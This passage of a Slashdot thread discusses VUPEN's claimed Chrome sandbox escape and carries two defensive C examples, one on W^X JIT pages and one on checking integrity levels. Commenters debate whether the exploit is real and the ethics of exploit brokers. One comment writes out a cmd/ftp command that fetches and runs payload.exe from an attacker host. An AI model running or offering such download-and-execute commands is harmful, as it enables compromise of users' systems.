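 * wx_strict = 1: W^X discipline, the page is RW while being written and RX while running.
 * wx_strict = 0: the naive JIT, one RWX page for its whole lifetime.
 * Returns 0 on success with the result in *out, -1 if the mapping was refused. */
int jit_run_const(int32_t value, int wx_strict, int *out)
{
    long ps = sysconf(_SC_PAGESIZE);
    int prot = wx_strict ? (PROT_READ | PROT_WRITE)
                         : (PROT_READ | PROT_WRITE | PROT_EXEC);
    unsigned char *page = mmap(NULL, (size_t)ps, prot,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;                      /* e.g. an execmem policy refusing RWX */

    size_t n = emit_return_const(page, value);
    if (n == 0) { munmap(page, (size_t)ps); return -1; }

    /* Make the freshly written instructions visible to the instruction cache (required on ARM). */
    __builtin___clear_cache((char *)page, (char *)page + n);

    /* W^X: drop write permission before the first execution. */
    if (wx_strict && mprotect(page, (size_t)ps, PROT_READ | PROT_EXEC) != 0) {
        munmap(page, (size_t)ps);
        return -1;
    }

    jit_fn fn;
    memcpy(&fn, &page, sizeof fn);      /* data pointer -> function pointer */
    *out = fn();
    munmap(page, (size_t)ps);
    return 0;
}

int main(void)
{
    int r;
    if (jit_run_const(42, 1, &r) == 0)
        printf("W^X JIT returned %d\n", r);
    if (jit_run_const(42, 0, &r) == 0)
        printf("RWX JIT returned %d (DEP gave no protection here)\n", r);
    else
        printf("RWX mapping refused by the kernel\n");
    return 0;
}
```

The point of the W^X variant is not that it makes a JIT unexploitable (an attacker who controls what gets emitted, or who can call mprotect through a code-reuse chain, still wins), but that it removes the standing RWX region a memory-corruption bug would otherwise write straight into; on a system with an execmem policy (SELinux, PaX-style kernels) the naive variant's mmap is refused outright, which is the mitigation doing its job.
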
    3. Re:So... by StayFrosty · · Score: 2

      The extension you are looking for is called NotScripts.

      --
      "Frequently wrong, never in doubt."
  12. Re:I don't care about theoretical/researched explo by Anonymous Coward · · Score: 2

    True, but security researchers are not fighting the scattered guy in the basement who manages to find a hole.

    There are criminal organizations which are big enough to fund people in researching holes, as well as buying 0-days from the black market. Then using these either for a focused attack against a company, or cast it on the wind to gather up clients for a botnet. All that is needed is a 0-day hole in a browser or browser add-on coupled with an exploit to get Administrator rights, paste this on the Web using ad rotation services, and it can easily bring in large numbers of compromised machines.

  13. What makes this extra awesome: Native Client by bl8n8r · · Score: 2

    This is the reason you don't want your browser able to access native OS code; when there's an exploit, the keys to the kingdom are in the browser.
    http://www.theregister.co.uk/2010/12/08/google_on_native_client/

    --
    boycott slashdot February 10th - 17th check out: altSlashdot.org
    1. Re:What makes this extra awesome: Native Client by Anonymous Coward · · Score: 0

      NaCl isn't ActiveX+LowIntegrity; if a NaCl library reached the outer sandbox, NaCl would be shown as inherently flawed. It's actually safer in some respects than the main browser is, probably most interpreters too.

    2. Re:What makes this extra awesome: Native Client by Anonymous Coward · · Score: 1

      This is the reason you don't want your browser able to access native OS code; when there's an exploit, the keys to the kingdom are in the browser.
      http://www.theregister.co.uk/2010/12/08/google_on_native_client/

      Native Client doesn't allow access to native OS code; it allows a restricted set of machine instructions to run in an environment that is not only heavily sandboxed, but verified pre-execution. Because it's meant to be cross-platform, it does not allow calls to the underlying OS at all. It enforces this limitation by doing a code scan to detect unauthorized instructions, unsafe branch targets, and such. It's really quite sophisticated, albeit practically unusable due to how locked down it is.

      It'd be daft to say it will never be exploited, but it's hardly handing over the keys to the kingdom. Maybe you were thinking of NPAPI or ActiveX; both of those allow full access to the underlying OS APIs.

  14. Video / Article mismatched by Archangel+Michael · · Score: 1

    Okay, I've watched the Video twice, and read both linked articles (yeah I did) and it said that it was ..

    The video shows the exploit in action with Google Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64). The user is tricked into visiting a specially crafted web page hosting the exploit which will execute various payloads to ultimately download the Calculator from a remote location and launch it outside the sandbox at Medium integrity level.

    Well I did see the Calculator applet get started, and I do see that it is a Microsoft Version. I did not see it get "downloaded", which is acceptable if it was a background download. But I don't know if it did, or if it simply called the local version already installed as part of the OS.

    Just saying the whole thing is very skimpy and light on details and specifics.

    --
    Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
    1. Re:Video / Article mismatched by Anonymous Coward · · Score: 0

      Starting a new process is already evidence of having escaped low-IL isolation.

    2. Re:Video / Article mismatched by Anonymous Coward · · Score: 0

      Just launching Calculator implies that arbitrary code was downloaded and executed. You can't launch a process through Javascript.

    3. Re:Video / Article mismatched by cbhacking · · Score: 1

      Umm... who the hell cares? If you can launch a Medium IL process, then you're out of the sandbox and can launch *any* medium IL process, even if it's from \Windows\System32\ on the local box. For example, you could instead launch
      \Windows\System32\cmd.exe /C "ftp myexploitsite.com/payload.exe" && payload.exe
      Commands simplified for readability, but you can do this. You probably won't have Admin, but you can still do a lot of damage - and if the user is one of those idiots who decided that UAC is too much hassle to deal with, then their whole box can be taken over.

      --
      There's no place I could be, since I've found Serenity...
  15. They could very well be lying by Anonymous Coward · · Score: 0

    The only evidence of the supposed vulnerabilities is a rather crappy video that could be easily faked.
    And this is disclosed by a company that sells vulnerabilities to make a buck.
    Maybe the vulnerabilities are there, in which case their behaviour is downright evil. Or maybe they aren't there, and they created the video precisely because they couldn't find a hole in Chrome and want users to switch to something less secure.

  16. Why would the government care? by dicobalt · · Score: 5, Funny

    They run IE6.

    1. Re:Why would the government care? by Anonymous Coward · · Score: 0

      Skip this, we are upgrading to IE4 on Windows 98. No services in 98. We can overwrite the Program Files and Windows directories every few hours to 'fix' issues.

    2. Re:Why would the government care? by Anonymous Coward · · Score: 0

      As a poster noted higher up, their business is to sell those exploits to government agencies so they can carry out their "offensive missions".
      So they care because unwary rebels and other dissidents may run something more up to date than IE 6 :)

  17. Re:And.. by bonch · · Score: 1

    The stupidity of your post isn't the worst part. It's the fact that, as of this writing, you're modded Insightful.

  18. Intel vulnerable by Anonymous Coward · · Score: 0

    If it bypasses the sandbox, ASLR, and DEP, wouldn't that mean that it probably exploits Intel's basic hardware flaw, a poorly implemented stack with addressable registers?

  19. Re:And.. by icebraining · · Score: 2, Interesting

    Chrome's sandbox is Windows' sandbox, so that's perfectly possible.

  20. Really? by petteyg359 · · Score: 2

    1. Watching the video, I see nothing that couldn't be achieved with ExtJS.

    2. Chrome often has multiple processes listed in task manager. In their video, they conveniently cover all those process names with another window so you can't see them.

    3. Suspicious overuse of "pwn". No company worth respecting would use "pwn" in a press release.

    1. Re:Really? by Bitsy+Boffin · · Score: 1

      Errr, perhaps you missed where they apparently had the browser start the windows calculator executable. That's a fairly fundamental ownage right there.

      --
      NZ Electronics Enthusiasts: Check out my Trade Me Listings
    2. Re:Really? by EdIII · · Score: 1

      Ok. I can schedule a task from the command line to run the calculator app. Not only that, but with custom event filters that trigger it, it would be possible to get a modified Google Chrome itself to cause the calculator to open.

      His point is that they seem to be hiding something with the process window being obscured and yours is the simple fact the calculator pops up without actually running the calculator app (which could be bound to a hot-key you did not see pressed to btw) and therefore provides some credibility or a defense against skepticism.

      The whole thing may be allegedly true or not. If they really have that capability I find it curious that they are even advertising it as a press release? Why? You could sell that to any Intelligence Agency for millions. I doubt they would need to publicly acknowledge the auction.

      They openly said they will NOT disclose this to Google. VUPEN basically just advertised a fancy new weapon to their "exclusively" government customers.

      The whole thing smells fishy because if VUPEN really is making their bucks off specially designed and coded cyber-weapons the last farking thing they want to do is alert Google to the mere possibility they can do what they can do.

      None of it makes any sense. Sure I see what you see too, but damned, if I am still not skeptical for so many many reasons.

    3. Re:Really? by Anne+Honime · · Score: 1

      As I wrote further below, the co-owner of VUPEN has won this year's pwn2own contest by smashing another webkit based browser to pieces : http://www.zdnet.com/blog/security/safarimacbook-first-to-fall-at-pwn2own-2011/8358

      I don't see why he would be lying here when he already proved publicly he had the capability to exploit much the same flaw elsewhere.

    4. Re:Really? by TheThiefMaster · · Score: 1

      In process explorer, the calc.exe is only indented far enough to be a child of explorer.exe, not chrome.exe. So surely calc.exe was launched from explorer, not chrome?

  21. How the exploit will be used by Hmmm2000 · · Score: 5, Interesting

    To me the most troubling part of this issue is what VUPEN does ... from their web site -- "Exclusive and sophisticated exploits for Law Enforcement Agencies". So, the reason the exploit is not being made public is so that Government agencies can use these exploits to install keyloggers or whatever they choose on whatever computer they wish to target and monitor.

    1. Re:How the exploit will be used by Anonymous Coward · · Score: 1

      What kind of professional research firm for Law Enforcement uses the "word" "Pwned" in a press release?

    2. Re:How the exploit will be used by Anonymous Coward · · Score: 0

      A French one.

    3. Re:How the exploit will be used by kangsterizer · · Score: 1

      The French.

    4. Re:How the exploit will be used by Anonymous Coward · · Score: 0

      No, the reason it's only being made partially public is, I can only assume, to drum up business because they don't have any customers - if they did, we wouldn't be hearing about the exploit at all.

    5. Re:How the exploit will be used by gmhowell · · Score: 1

      The French.

      Then shouldn't it be 'le pwned'?

      --
      Jesus was all right but his disciples were thick and ordinary. -John Lennon
    6. Re:How the exploit will be used by EdIII · · Score: 1

      Then why advertise it in a press release?

      That would be like me constructing a dirty bomb the size of a suitcase, undetectable by everything including the TSA, and then taking out an advertisement in the New York times announcing it exists, but only available to be auctioned to qualified really-super-scary terrorists.

      You advertise a bug like this obscuring the results when you want to COOPERATE with the open/closed source programming community to both do the right thing and to gain credentials that your company actually knows something.

      You don't advertise shit like this when you are searching for a buyer that is probably part of organized crime in eastern Europe.

      Law enforcement trying to obtain tools used to violate our rights is not the most "troubling" (or puzzling) part of this story.

    7. Re:How the exploit will be used by Anonymous Coward · · Score: 0

      They make weapons and then distribute them to children.

    8. Re:How the exploit will be used by tlhIngan · · Score: 1

      Well, I suppose they're "saving" it for Pwn2Own. But given CanSecWest happened recently, they're also doing a CYA - if it gets revealed how it works, they've already scooped the story.

      So it's a win-win. Either an easy victory to win that Windows laptop (sure it ain't a shiny Macbook that everyone else is going for... but it's also less competition), plus lots of money from those interested, and credit should someone else happen to discover the same bug.

  22. Pretentiousness by Eponymous+Hero · · Score: 1

    "The problem with being better than everyone is that people tend to think you're pretentious."

    --
    insensitive clod overlords obligatory xkcd car analogy russian reversals whoosh pedant fanbois ftfy in 3...2...1..PROFIT
    1. Re:Pretentiousness by clang_jangle · · Score: 2

      Actually, the problem is so many people have no self-respect, and easily dismiss anyone who does as "smug". In fact, "smug" is one of the top insults routinely hurled about by people who feel inferior. They hope to "cut them down to size", "put them in their place", etc. If they believe they achieve it, they feel slightly less inferior for a minute or two. The failure, of course, is that no-one who matters really cares about all that drama. The "smug" accusers are nearly always trolls with nothing to offer anyway. It's a branch of the "shame and blame" control drama.

      --
      Caveat Utilitor
    2. Re:Pretentiousness by bryan1945 · · Score: 1

      Reminds me of a certain South Park episode.

      --
      Vote monkeys into Congress. They are cheaper and more trustworthy.
    3. Re:Pretentiousness by Anonymous Coward · · Score: 0

      Well the 12 or so people on /. who watch SP know what you're talking about, but we adults don't know, which I suppose was the idea? How passive-aggressive.

  23. Suspect by Anonymous Coward · · Score: 0

    If the motivation in not disclosing the bug is preventing Google from patching it, then why did they even announce it? That doesn't make sense.

    Something smells fishy. I haven't RTFA, has anyone been able to verify that these bugs are actually real?

  24. Re:And.. by black3d · · Score: 2

    I'm glad you put "possible" in italics to emphasise that this didn't necessarily mean it was the cause of the issue. Chrome implementing the sandbox, while overriding memory protection, kind of negates the purpose of the sandbox. (Although, it prevents "natively" bad stuff from affecting the system. However anything attacking the browser itself can still access system memory).

    To be fair though, the demonstration of this vulnerability has exposed nothing other than the ability to load known programs in known locations, without any additional parameters. They may be able to, but that hasn't been demonstrated, and won't be if they aren't releasing any "details".

    --
    "The true measure of a person is how they act when they know they won't get caught." - DSRilk
  25. Before everyone start yelling "fake" by Anne+Honime · · Score: 2

    A quick search turns out VUPEN co-founder BEKRAR Chaouki was the winner of pwn2own 2011 : http://www.zdnet.com/blog/security/safarimacbook-first-to-fall-at-pwn2own-2011/8358

    Not to say it proves he did it again with Chrome, but at least the guy's got some credit for being able to pull this one.

  26. Re:And.. by ozmanjusri · · Score: 0

    Do you have evidence that this exploit will work on any platform other than Windows?

    --
    "I've got more toys than Teruhisa Kitahara."
  27. Interesting, why the government? by elucido · · Score: 1

    Does this mean government contractors will get access to the exploit code?
    I guess this will help them wiretap.

  28. Re:And.. by Anonymous Coward · · Score: 1

    You are confusing a Sandbox written by google for Windows with a Windows Sandbox written by Microsoft. Google WROTE the windows sandbox that chrome uses.

  29. Stuff you can figure out from the video... by ben.craig · · Score: 1

    If you look closely, the first time the video shows process explorer, the PID of the parent chrome process is 1388 with integrity at "Medium", and a child chrome process's PID is 1928 with integrity set at "Low". After the hack, process explorer shows a child chrome process with PID 804 and integrity "Medium", all other processes except for the calculator are obscured. I can guess-timate that the original parent and child are still there though, as there is still a low integrity process somewhat near the bottom of the list.

    After looking at the documentation for process explorer, the gray colored process line (most likely the parent chrome process) is suspended, which seems odd. I'm not entirely sure I'm seeing the correct part of the process explorer docs here.

    Another thing to note is that the calc.exe process has no parent. That means that whatever spawned it has already died.

    The video suggests that a fairly standard ASLR attack was made: guess and check. ASLR makes it difficult to reliably guess an address the first time. Most of the time, if a hack guesses wrong, the process dies and the attacker doesn't get another chance. It seems that the attacker found a place (or made a place) where they could "guess" repeatedly. Given the prior information, that suggests that the child process somehow caused the parent process to repeatedly spawn chrome subprocesses that had some attacker controlled information in it. Each time, that information is probably a little bit different until the attacker guessed "right", and successfully executed the right attack code.

    1. Re:Stuff you can figure out from the video... by ben.craig · · Score: 1

      Or maybe the gray colored process line is just the last selected process, which makes way more sense.

    2. Re:Stuff you can figure out from the video... by spongman · · Score: 1

      correct, suspended processes have a darker gray background. the light gray is the selection highlight for inactive windows.

      it's somewhat suspicious, though, that the un-maximized chrome window is set up to obscure all but the new medium-trust chrome.exe and calc.exe.

      it looks to me like they've done some heap spraying in chrome.exe (see the unusual 450MB working set).

      the list of 'gray' processes in the 2nd procexp session are:
      1) explorer.exe
      2) process_explorer.exe
      3) process_explorer64.exe
      4) chrome.exe (UI)
      5) chrome.exe (low-trust child)
      6) (new, unknown.exe)
      7) heap-sprayed, medium chrome.exe
      8) calc.exe

      as for #6, above, you can see the bottom 2 rows of pixels of the icon, and it doesn't look like chrome's icon, maybe rundll32.exe ?

  30. Responsibility by fred133 · · Score: 1

    Since they aren't informing the Vendor so it can get patched,
    Are they going to take responsibility when it does get into the wild?
    Oh, we're a big security company, we're secure!
      Yeah right!
    Show me a boat that doesn't leak!

    1. Re:Responsibility by dhavleak · · Score: 2

      Or they could do what Google's security researchers do when they find an issue in an MS product -- release the details to the world within 48 hours (those 48 hours being Saturday and Sunday).

    2. Re:Responsibility by Rennt · · Score: 0

      Pretty sure Google gives MS the details of the exploit before starting the clock.

  31. The govt is gonna be pissed when they read it... by Anonymous Coward · · Score: 0

    Since the company mission is to provide exploits to government customers for offensive use... they just gave this one away. If you don't think a team of very smart people at google are looking into how this could be done right now... I would guess a fix is out within the next few versions

  32. Re:And.. by WorBlux · · Score: 1

    But.. "At its core, the sandbox relies on the protection provided by four Windows mechanisms: A restricted token The Windows job object The Windows desktop object Windows Vista only: The integrity levels" Because the exploit hasn't been released it's unclear whether the bug was in those systems, or the broker code of Chromium, or possibly even one or more in both.
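
The integrity-level mechanism quoted above is also the one the video analysis earlier in the thread (the PID 1928 "Low" child versus the PID 804 "Medium" child, and "starting a new process is already evidence of having escaped low-IL isolation") leans on. As an added example that is not from the original page or from Chromium, here is how a practitioner would check it rather than eyeball a Process Explorer screenshot: the mandatory-label SID S-1-16-<rid> is parsed into its RID, mapped to the Untrusted/Low/Medium/High/System name Process Explorer prints, and compared against the sandbox ceiling (Low, RID 4096); on Windows the same RID is read straight from a process token with OpenProcessToken/GetTokenInformation(TokenIntegrityLevel). The SID strings in main() are constructed sample input standing in for what `whoami /groups` reports, and the function names are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* RIDs of the Windows mandatory-label SIDs S-1-16-<rid>. */
enum {
    IL_UNTRUSTED = 0x0000,
    IL_LOW       = 0x1000,   /* 4096:  where the Chrome renderer sandbox runs */
    IL_MEDIUM    = 0x2000,   /* 8192:  a normal user process                  */
    IL_HIGH      = 0x3000,   /* 12288: elevated (past UAC)                     */
    IL_SYSTEM    = 0x4000    /* 16384                                          */
};

/* Name Process Explorer shows for an integrity RID; a RID between two defined
 * levels belongs to the level below it, since the comparison is ordinal. */
const char *il_name(long rid)
{
    if (rid < 0)         return "Unknown";
    if (rid < IL_LOW)    return "Untrusted";
    if (rid < IL_MEDIUM) return "Low";
    if (rid < IL_HIGH)   return "Medium";
    if (rid < IL_SYSTEM) return "High";
    return "System";
}

/* Parse the mandatory-label SID as printed by `whoami /groups` ("S-1-16-4096").
 * Returns the RID, or -1 if the string is not an S-1-16-* SID. */
long il_rid_from_sid(const char *sid)
{
    static const char prefix[] = "S-1-16-";
    size_t plen = sizeof prefix - 1;
    if (strncmp(sid, prefix, plen) != 0) return -1;
    char *end;
    unsigned long rid = strtoul(sid + plen, &end, 10);
    if (end == sid + plen || *end != '\0') return -1;
    return (long)rid;
}

/* The sandbox-escape check: a process that should be confined at `ceiling`
 * (Low for a renderer) but is running above it. Returns 1 when it exceeds it. */
int il_exceeds(long rid, long ceiling)
{
    return rid > ceiling;
}

#ifdef _WIN32
#include <windows.h>
/* Read the integrity RID of a live process token (what the SID string above encodes). */
long process_il_rid(HANDLE process)
{
    HANDLE tok;
    if (!OpenProcessToken(process, TOKEN_QUERY, &tok)) return -1;
    DWORD len = 0;
    GetTokenInformation(tok, TokenIntegrityLevel, NULL, 0, &len);
    TOKEN_MANDATORY_LABEL *tml = (TOKEN_MANDATORY_LABEL *)malloc(len);
    long rid = -1;
    if (tml && GetTokenInformation(tok, TokenIntegrityLevel, tml, len, &len)) {
        PSID sid = tml->Label.Sid;
        rid = (long)*GetSidSubAuthority(sid, *GetSidSubAuthorityCount(sid) - 1);
    }
    free(tml);
    CloseHandle(tok);
    return rid;
}
#endif

int main(void)
{
    /* Constructed sample: a Low-IL renderer and a process spawned at Medium. */
    const char *renderer = "S-1-16-4096", *spawned = "S-1-16-8192";
    long r = il_rid_from_sid(renderer), s = il_rid_from_sid(spawned);
    printf("renderer: %s, spawned process: %s\n", il_name(r), il_name(s));
    printf("spawned process exceeds the Low ceiling: %s\n",
           il_exceeds(s, IL_LOW) ? "yes" : "no");
#ifdef _WIN32
    long self = process_il_rid(GetCurrentProcess());
    printf("this process: %s (%ld)\n", il_name(self), self);
#endif
    return 0;
}
```

Integrity level is only one of the four mechanisms in the quoted list; a Medium-IL process is evidence the token, job and integrity restrictions were all left behind, but it says nothing about which of them, or which piece of broker code, was the one that gave way.
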

  33. Cheap - flawed - marketing by cheros · · Score: 1

    That video shows exactly nothing - any 2 screen system can do Windows-R + "calc" offscreen and lob it into the picture, whilst it's looking at a web page. You can also not see if it really is a sub-process, that part is obscured. As far as I can judge by the indentation it is NOT a sub process - thus no hack. But I'm no expert - unlike them I won't pretend to be one either. In summary, this *seriously* lacks credibility.

    It's IMHO a rather stupid attempt at getting their name out there and lick up to the French Government. As Government I would not use them now because they have gone public with something that could have been useful (if it exists), and as a company I would avoid them like the plague because I would not know who they would sell my vulnerabilities to (instead of me).

    Oh, and as for Google? You know, wouldn't it be funny if their website never showed up in any Google search... After all, can't let them do any evil now, can we?

    --
    Insert .sig here. Send no money now. Owner may sue, contents will settle. Batteries not included.
  34. Re:And.. by master_p · · Score: 1, Troll

    And after reading the above, I conclude that the Windows security model is ...sh1t.

    First of all, it's extremely complex. It takes a long web page just to describe some aspects of it.

    Secondly, it's extremely disjoint: each little piece of Windows, having been developed in isolation, went its own way, which results in not being able to enforce a single security system all over the system.

  35. Re:happened to me last night :( by intheshelter · · Score: 1

    WHAT! Haven't you heard that Apple is Evil and Steve Jobs wants to track and eat your shiny baby and market it to look cool to the other fanbois? What that means is that this is not really a problem with Chrome because it's OPEN and it's really the problem of your iPhone because it's tracking the cell towers you go near and you should instead buy Android so Google can keep you safe by tracking EVERYTHING!!

    AHHHHHHHHHH, THE SKY IS FALLING!

  36. Sandbox not in os by currently_awake · · Score: 1

    To be done right a sandbox must either be implemented with hardware (max privilege required) or be an interpreter that mimics (virtual) that setup. The best place for a sandbox is in the OS itself- something Windows doesn't do. Without that you are a single buffer overflow or improperly passed pointer away from a compromised system.

  37. derp derp derp by Anonymous Coward · · Score: 0

    so gay....

    this company gets to help infringe upon people's right against illegal search and seizure and warrantless wiretapping, but they freely do business with Govt/LEO.

    I can't wait until they get the bright idea to start doxing anon